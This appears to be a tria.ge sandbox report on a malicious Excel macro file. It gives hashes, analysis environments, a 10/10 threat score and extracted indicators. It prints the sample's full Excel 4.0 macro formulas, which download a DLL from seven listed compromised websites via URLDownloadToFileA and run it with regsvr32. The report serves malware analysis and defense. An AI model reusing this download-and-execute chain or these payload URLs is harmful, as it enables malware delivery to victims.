Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
General
-
Target
c9355cfd13bd7ec589f5bdebd64652c934afc6aa00188f0866b2ea508cffb797
-
Size
21KB
-
Sample
241111-1x8dps1laq
-
MD5
f73be5787c3b5a01d5afe4048c3affa0
-
SHA1
1c36e605b05994d4fe3bed5ddf2f262e0c94f2f4
-
SHA256
c9355cfd13bd7ec589f5bdebd64652c934afc6aa00188f0866b2ea508cffb797
-
SHA512
7c749c5718a146587335af5d1a52bc1af614d381feda4c90c7fe74810681df54536312563c6e74d3f535aaaeb2b84c8871ba46d388c17f0b632a422ccd2e30fa
-
SSDEEP
384:H3uAi/NjIVRS8EibbwBlw75SYrLb5CzgObff9kC+xbX74eII:bsNs/zXtFCBn9kC+xbL42
Behavioral task
behavioral1
Sample
c9355cfd13bd7ec589f5bdebd64652c934afc6aa00188f0866b2ea508cffb797.xlsm
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
c9355cfd13bd7ec589f5bdebd64652c934afc6aa00188f0866b2ea508cffb797.xlsm
Resource
win10v2004-20241007-en
Malware Config
Extracted
https://www.almoeqatar.com/cgi-bin/3g/
http://www.ayelet.info/wp-admin/oHRoG0X9ubuNtQ/
http://www.lavameapp.com.ar/slide-images/7bzQevDGMld/
http://lista33rivera.uy/wp-content/jiBtjSaJMcM/
http://cenaf.com.co/error/TpewL/
http://pusatbahasa.unsyiah.ac.id/backup/qWzXJpGddclh4zZjt/
http://baykusoglu.com.tr/wp-admin/317Sz3wZsYmAAmmL6/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.almoeqatar.com/cgi-bin/3g/","..\rfs.dll",0,0) =IF('PCWV'!G13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.ayelet.info/wp-admin/oHRoG0X9ubuNtQ/","..\rfs.dll",0,0)) =IF('PCWV'!G15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.lavameapp.com.ar/slide-images/7bzQevDGMld/","..\rfs.dll",0,0)) =IF('PCWV'!G17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://lista33rivera.uy/wp-content/jiBtjSaJMcM/","..\rfs.dll",0,0)) =IF('PCWV'!G19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://cenaf.com.co/error/TpewL/","..\rfs.dll",0,0)) =IF('PCWV'!G21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://pusatbahasa.unsyiah.ac.id/backup/qWzXJpGddclh4zZjt/","..\rfs.dll",0,0)) =IF('PCWV'!G23<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://baykusoglu.com.tr/wp-admin/317Sz3wZsYmAAmmL6/","..\rfs.dll",0,0)) =IF('PCWV'!G25<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\rfs.dll") =RETURN()
Extracted
https://www.almoeqatar.com/cgi-bin/3g/
http://www.ayelet.info/wp-admin/oHRoG0X9ubuNtQ/
http://www.lavameapp.com.ar/slide-images/7bzQevDGMld/
http://lista33rivera.uy/wp-content/jiBtjSaJMcM/
http://cenaf.com.co/error/TpewL/
Targets
-
-
Target
c9355cfd13bd7ec589f5bdebd64652c934afc6aa00188f0866b2ea508cffb797
-
Size
21KB
-
MD5
f73be5787c3b5a01d5afe4048c3affa0
-
SHA1
1c36e605b05994d4fe3bed5ddf2f262e0c94f2f4
-
SHA256
c9355cfd13bd7ec589f5bdebd64652c934afc6aa00188f0866b2ea508cffb797
-
SHA512
7c749c5718a146587335af5d1a52bc1af614d381feda4c90c7fe74810681df54536312563c6e74d3f535aaaeb2b84c8871ba46d388c17f0b632a422ccd2e30fa
-
SSDEEP
384:H3uAi/NjIVRS8EibbwBlw75SYrLb5CzgObff9kC+xbX74eII:bsNs/zXtFCBn9kC+xbL42
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-